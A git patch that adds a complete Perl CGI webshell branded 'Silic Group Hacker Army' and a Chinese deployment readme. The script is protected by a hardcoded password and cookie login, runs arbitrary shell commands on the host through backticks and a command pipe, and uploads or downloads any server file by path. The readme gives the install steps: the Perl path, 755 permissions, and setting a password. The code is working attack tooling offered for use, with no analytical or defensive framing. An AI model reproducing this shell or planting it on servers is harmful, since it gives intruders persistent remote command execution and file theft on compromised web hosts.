From efb57e727033f9971cc5e60e5ce8fd97627a3639 Mon Sep 17 00:00:00 2001 From: tennc Date: Fri, 18 Oct 2013 10:32:43 +0800 Subject: [PATCH] update perl shell update Silic Group perl webshell --- pl/Silic Group_cgi.pl | 293 ++++++++++++++++++++++++++++++++++++++ pl/Silic Group_readme.txt | 20 +++ 2 files changed, 313 insertions(+) create mode 100644 pl/Silic Group_cgi.pl create mode 100644 pl/Silic Group_readme.txt diff --git a/pl/Silic Group_cgi.pl b/pl/Silic Group_cgi.pl new file mode 100644 index 0000000..cb9553f --- /dev/null +++ b/pl/Silic Group_cgi.pl @@ -0,0 +1,293 @@ +#!/usr/bin/perl -I/usr/local/bandmin +# 第一行指向正确(大部分不需修改),错误则500,未安装不解析 +# 如果是Win服务器,设置$WinNT=1; +# 设置本文件属性为755 +$Password="silic"; +$WinNT=0; +$NTCmdSep="&"; +$UnixCmdSep=";"; +$CommandTimeoutDuration=50; +$ShowDynamicOutput=1; +$CmdSep=($WinNT ? $NTCmdSep : $UnixCmdSep); +$CmdPwd=($WinNT ? "cd" : "pwd"); +$PathSep=($WinNT ? "\\" : "/"); +$Redirector=($WinNT ? " 2>&1 1>&2" : " 1>&1 2>&1"); +sub ReadParse{ + local(*in)=@_ if @_; + local($i,$loc,$key,$val); + $MultipartFormData=$ENV{'CONTENT_TYPE'} =~ /multipart\/form-data; boundary=(.+)$/; + if($ENV{'REQUEST_METHOD'} eq "GET"){$in=$ENV{'QUERY_STRING'};} + elsif($ENV{'REQUEST_METHOD'} eq "POST"){binmode(STDIN) if $MultipartFormData & $WinNT;read(STDIN, $in, $ENV{'CONTENT_LENGTH'});} + if($ENV{'CONTENT_TYPE'} =~ /multipart\/form-data; boundary=(.+)$/){ + $Boundary='--'.$1; + @list=split(/$Boundary/,$in); + $HeaderBody=$list[1]; + $HeaderBody =~ /\r\n\r\n|\n\n/; + $Header=$`; + $Body=$'; + $Body =~ s/\r\n$//; # the last \r\n was put in by Netscape + $in{'filedata'}=$Body; + $Header =~ /filename=\"(.+)\"/; + $in{'f'}=$1; + $in{'f'} =~ s/\"//g; + $in{'f'} =~ s/\s//g; + for($i=2; $list[$i]; $i++){ + $list[$i] =~ s/^.+name=$//; + $list[$i] =~ /\"(\w+)\"/; + $key=$1; + $val=$'; + $val =~ s/(^(\r\n\r\n|\n\n))|(\r\n$|\n$)//g; + $val =~ s/%(..)/pack("c", hex($1))/ge; + $in{$key}=$val;}} + else{ + @in=split(/&/, $in); + foreach $i (0 .. $#in){ + $in[$i] =~ s/\+/ /g; + ($key, $val)=split(/=/, $in[$i], 2); + $key =~ s/%(..)/pack("c", hex($1))/ge; + $val =~ s/%(..)/pack("c", hex($1))/ge; + $in{$key} .= "\0" if (defined($in{$key})); + $in{$key} .= $val;}} +} +sub PrintPageHeader{ +$EncodedCurrentDir=$CurrentDir; +$EncodedCurrentDir =~ s/([^a-zA-Z0-9])/'%'.unpack("H*",$1)/eg; +print "Content-type: text/html\n\n"; +print < +Silic Group Hacker Army - BlackBap.Org +$HtmlMetaHeader + + + + + + +
 ⊙ $ServerName:$ENV{'SERVER_PORT'} - $ENV{'SERVER_SOFTWARE'} - $ENV{'GATEWAY_INTERFACE'}
+   文件上传 | + 文件下载 | + 注销登录 | + power by Silic Group +
+ +END +} +sub PrintLoginScreen{$Message;} +sub PrintLoginFailedMessage{print "Login Failed,Wrong Password,Do You Want Try Again... //BlackBap.Org";} +sub PrintLoginForm{ +print < +
+
+
Login
+
PASS:
+
+
+
+ +END +} +sub PrintPageFooter{print "
";} +sub GetCookies{@httpcookies=split(/; /,$ENV{'HTTP_COOKIE'}); +foreach $cookie(@httpcookies){($id, $val)=split(/=/, $cookie);$Cookies{$id}=$val;}} +sub PrintLogoutScreen{print "Logout Success... //BlackBap.Org

";} +sub PerformLogout{ + print "Set-Cookie: SAVEDPWD=;\n"; + &PrintPageHeader("p"); + &PrintLogoutScreen; + &PrintLoginScreen; + &PrintLoginForm; + &PrintPageFooter; +} +sub PerformLogin { + if($LoginPassword eq $Password){ + print "Set-Cookie: SAVEDPWD=$LoginPassword;\n"; + &PrintPageHeader("c"); + &PrintCommandLineInputForm; + &PrintPageFooter; + }else{ + &PrintPageHeader("p"); + &PrintLoginScreen; + if($LoginPassword ne ""){&PrintLoginFailedMessage;} + &PrintLoginForm; + &PrintPageFooter; + } +} +sub PrintCommandLineInputForm{ +$Prompt=$WinNT ? "$CurrentDir> ":"[Silic\@$ServerName $CurrentDir]\$ "; +print < +
+ + +$Prompt + +
+ +END +} +sub PrintFileDownloadForm{ +$Prompt=$WinNT ? "$CurrentDir> " : "[r00t\@$ServerName $CurrentDir]\$ "; +print < +
+ + +$Prompt download

+Filename:

+Download: +
+ +END +} +sub PrintFileUploadForm{ +$Prompt=$WinNT ? "$CurrentDir> " : "[r00t\@$ServerName $CurrentDir]\$ "; +print < +
+$Prompt upload

+Filename:

+Options:   +Overwrite if it Exists

+Upload:    + + +
+ +END +} +sub CommandTimeout{ +if(!$WinNT){ +alarm(0); +print < + +Command exceeded maximum time of $CommandTimeoutDuration second(s). +
Killed it! + +END +&PrintCommandLineInputForm; +&PrintPageFooter; +exit;} +} +sub ExecuteCommand{ + if($RunCommand =~ m/^\s*cd\s+(.+)/){ + $OldDir=$CurrentDir; + $Command="cd \"$CurrentDir\"".$CmdSep."cd $1".$CmdSep.$CmdPwd; + chop($CurrentDir=`$Command`); + &PrintPageHeader("c"); + $Prompt=$WinNT ? "$OldDir> " : "[r00t\@$ServerName $OldDir]\$ "; + print "$Prompt $RunCommand"; + }else{ + &PrintPageHeader("c"); + $Prompt=$WinNT ? "$CurrentDir> " : "[r00t\@$ServerName $CurrentDir]\$ "; + print "$Prompt $RunCommand"; + $Command="cd \"$CurrentDir\"".$CmdSep.$RunCommand.$Redirector; + if(!$WinNT){$SIG{'ALRM'}=\&CommandTimeout;alarm($CommandTimeoutDuration);} + if($ShowDynamicOutput){ + $|=1; + $Command .= " |"; + open(CommandOutput, $Command); + while(<CommandOutput>){$_ =~ s/(\n|\r\n)$//;print "$_\n";} + $|=0; + }else{print `$Command`;} + if(!$WinNT){alarm(0);} + print ""; + } + &PrintCommandLineInputForm; + &PrintPageFooter; +} +sub PrintDownloadLinkPage{ +local($FileUrl)=@_; +if(-e $FileUrl){ + $FileUrl =~ s/([^a-zA-Z0-9])/'%'.unpack("H*",$1)/eg; + $DownloadLink="$ScriptLocation?a=download&f=$FileUrl&o=go"; + $HtmlMetaHeader=""; + &PrintPageHeader("c"); +print < +Sending File $TransferFile...
+If the download does not start automatically, +Click Here. + +END + &PrintCommandLineInputForm; + &PrintPageFooter; +}else{ + &PrintPageHeader("f"); + print "下载失败 $FileUrl: $!"; + &PrintFileDownloadForm; + &PrintPageFooter;} +} +sub SendFileToBrowser{ + local($SendFile)=@_; + if(open(SENDFILE, $SendFile)) # file opened for reading + {if($WinNT){binmode(SENDFILE);binmode(STDOUT);} + $FileSize=(stat($SendFile))[7]; + ($Filename=$SendFile) =~ m!([^/^\\]*)$!; + print "Content-Type: application/x-unknown\n"; + print "Content-Length: $FileSize\n"; + print "Content-Disposition: attachment; filename=$1\n\n"; + print while(); + close(SENDFILE); + } + else{ + &PrintPageHeader("f"); + print "下载失败 $SendFile: $!"; + &PrintFileDownloadForm; + &PrintPageFooter; + } +} +sub BeginDownload{ +if(($WinNT & ($TransferFile =~ m/^\\|^.:/))|(!$WinNT & ($TransferFile =~ m/^\//))){$TargetFile=$TransferFile;} +else{chop($TargetFile) if($TargetFile=$CurrentDir) =~ m/[\\\/]$/;$TargetFile .= $PathSep.$TransferFile;} +if($Options eq "go"){&SendFileToBrowser($TargetFile);}else{&PrintDownloadLinkPage($TargetFile);} +} +sub UploadFile{ +if($TransferFile eq ""){&PrintPageHeader("f");&PrintFileUploadForm;&PrintPageFooter;return;} + &PrintPageHeader("c"); + print "Uploading $TransferFile to $CurrentDir...
"; + chop($TargetName) if ($TargetName=$CurrentDir) =~ m/[\\\/]$/; + $TransferFile =~ m!([^/^\\]*)$!; + $TargetName .= $PathSep.$1; + $TargetFileSize=length($in{'filedata'}); + if(-e $TargetName && $Options ne "overwrite"){print "Failed:目标文件已存在...
"; + }else{ + if(open(UPLOADFILE, ">$TargetName")){ + binmode(UPLOADFILE) if $WinNT; + print UPLOADFILE $in{'filedata'}; + close(UPLOADFILE); + print "Transfered $TargetFileSize Bytes.
"; + print "File Path: $TargetName
"; + }else{print "Failed: $!
";} + } + print ""; + &PrintCommandLineInputForm; + &PrintPageFooter; +} +sub DownloadFile{ + if($TransferFile eq ""){&PrintPageHeader("f");&PrintFileDownloadForm;&PrintPageFooter;return;} + if(($WinNT & ($TransferFile =~ m/^\\|^.:/))|(!$WinNT & ($TransferFile =~ m/^\//))){$TargetFile=$TransferFile;} + else{chop($TargetFile) if($TargetFile=$CurrentDir) =~ m/[\\\/]$/;$TargetFile .= $PathSep.$TransferFile;} + if($Options eq "go"){&SendFileToBrowser($TargetFile);} + else{&PrintDownloadLinkPage($TargetFile);} +} +&ReadParse; +&GetCookies; +$ScriptLocation=$ENV{'SCRIPT_NAME'}; +$ServerName=$ENV{'SERVER_NAME'}; + +$LoginPassword=$in{'p'}; +$RunCommand=$in{'c'}; +$TransferFile=$in{'f'}; +$Options=$in{'o'}; +$Action=$in{'a'}; +$Action="LOGIN" if($Action eq ""); +$CurrentDir=$in{'d'}; +chop($CurrentDir=`$CmdPwd`) if($CurrentDir eq ""); +$LoggedIn=$Cookies{'SAVEDPWD'} eq $Password; +if($Action eq "LOGIN" || !$LoggedIn){&PerformLogin;} +elsif($Action eq "command"){&ExecuteCommand;} +elsif($Action eq "upload"){&UploadFile;} +elsif($Action eq "download"){&DownloadFile;} +elsif($Action eq "logout"){&PerformLogout;} \ No newline at end of file diff --git a/pl/Silic Group_readme.txt b/pl/Silic Group_readme.txt new file mode 100644 index 0000000..9cda923 --- /dev/null +++ b/pl/Silic Group_readme.txt @@ -0,0 +1,20 @@ +使用说明: + + 1, 本脚本适用于支持Perl脚本的Web服务器 + + 2, 首先请确认脚本第一行指向的路径正确,默认情况大部分不需修改 + 若路径错误则出现500解析错误,未安装(不支持)Perl脚本则不会解析 + + 2, 如果服务器是Windows操作系统,请于代码中设置$WinNT=1; + + 3, 设置本文件属性为755,否则亦将出现500解析错误 + + 4, 密码请自行设置 + +########################################################################### + +技术自由,技术创新,技术共享,技术原创,技术进步 + +习科信息技术 - Silic Network Solutions Company + +//BlackBap.Org \ No newline at end of file